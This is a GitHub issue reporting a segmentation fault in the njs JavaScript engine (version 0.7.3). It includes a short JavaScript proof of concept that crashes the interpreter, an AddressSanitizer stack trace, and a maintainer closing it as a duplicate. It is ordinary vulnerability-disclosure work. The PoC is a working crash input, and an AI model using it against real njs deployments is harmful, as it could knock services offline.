Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SEGV src/njs_scope.h:73 in njs_scope_value #479

Closed
xmzyshypnc opened this issue Mar 2, 2022 · 1 comment
Closed

SEGV src/njs_scope.h:73 in njs_scope_value #479

xmzyshypnc opened this issue Mar 2, 2022 · 1 comment

Comments

@xmzyshypnc
Copy link

xmzyshypnc commented Mar 2, 2022

Environment

OS : Linux leanderwang-LC2 5.13.0-30-generic #33 SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : f65981b
Version : 0.7.3
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"

PoC

function main() {
    function func1(v1, v2) {
        Object.toString = v1;

        function func2() {
            try {
                var v9 = JSON[Object]();
            } catch (v10) {} finally {}
        }
        func2(func2, func1);
    }
    func1(func1);
}
main();

Stack dump

AddressSanitizer:DEADLYSIGNAL

==1797452==ERROR: AddressSanitizer: SEGV on unknown address 0x623740000128 (pc 0x55b5eda44bd3 bp 0x7ffd8f57c8b0 sp 0x7ffd8f57c080 T0)
==1797452==The signal is caused by a READ memory access.
#0 0x55b5eda44bd2 in njs_scope_value src/njs_scope.h:73
#1 0x55b5eda44bd2 in njs_scope_valid_value src/njs_scope.h:83
#2 0x55b5eda44bd2 in njs_vmcode_interpreter src/njs_vmcode.c:153
#3 0x55b5edaa0aba in njs_function_lambda_call src/njs_function.c:703
#4 0x55b5eda470fb in njs_vmcode_interpreter src/njs_vmcode.c:788
#5 0x55b5edaa0aba in njs_function_lambda_call src/njs_function.c:703
#6 0x55b5eda470fb in njs_vmcode_interpreter src/njs_vmcode.c:788
#7 0x55b5eda410ba in njs_vm_start src/njs_vm.c:553
#8 0x55b5eda2a3f8 in njs_process_script src/njs_shell.c:890
#9 0x55b5eda2aebf in njs_process_file src/njs_shell.c:619
#10 0x55b5eda2c21f in main src/njs_shell.c:303
#11 0x7f9edef54082 in __libc_start_main ../csu/libc-start.c:308
#12 0x55b5eda27c4d in _start (/home/wz/njs/njs/build/njs+0x4bc4d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/njs_scope.h:73 in njs_scope_value
==1797452==ABORTING

Credit

xmzyshypnc(@xmzyshypnc) and P1umer(@P1umer)

@xeioex
Copy link
Contributor

xeioex commented Apr 6, 2022

Duplicated of #467

@xeioex xeioex closed this as completed Apr 6, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants